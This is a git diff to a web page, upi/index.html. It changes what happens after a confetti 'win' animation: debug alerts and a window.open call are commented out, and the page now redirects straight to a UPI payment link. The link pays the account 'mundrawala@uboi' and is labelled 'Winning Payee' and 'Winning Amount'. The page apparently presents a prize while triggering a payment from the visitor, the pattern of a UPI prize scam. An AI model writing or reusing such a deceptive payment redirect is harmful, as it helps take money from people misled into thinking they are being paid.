--- a/upi/index.html
+++ b/upi/index.html
@@ -184,9 +184,10 @@ console.log(price);
       {
       document.querySelectorAll('.confetti')[i].style.visibility = 'visible';
       }
-      alert('s')
-      window.open('upi://pay?pa=mundrawala@uboi&pn=Winning Payee&tn=Winning Amount&am=1&mode=01')
-      alert('e')
+      // alert('s')
+      // window.open('upi://pay?pa=mundrawala@uboi&pn=Winning Payee&tn=Winning Amount&am=1&mode=01')
+      // alert('e')
+      window.location = 'upi://pay?pa=mundrawala@uboi&pn=Winning Payee&tn=Winning Amount&am=1&mode=01'
     }
   }
   
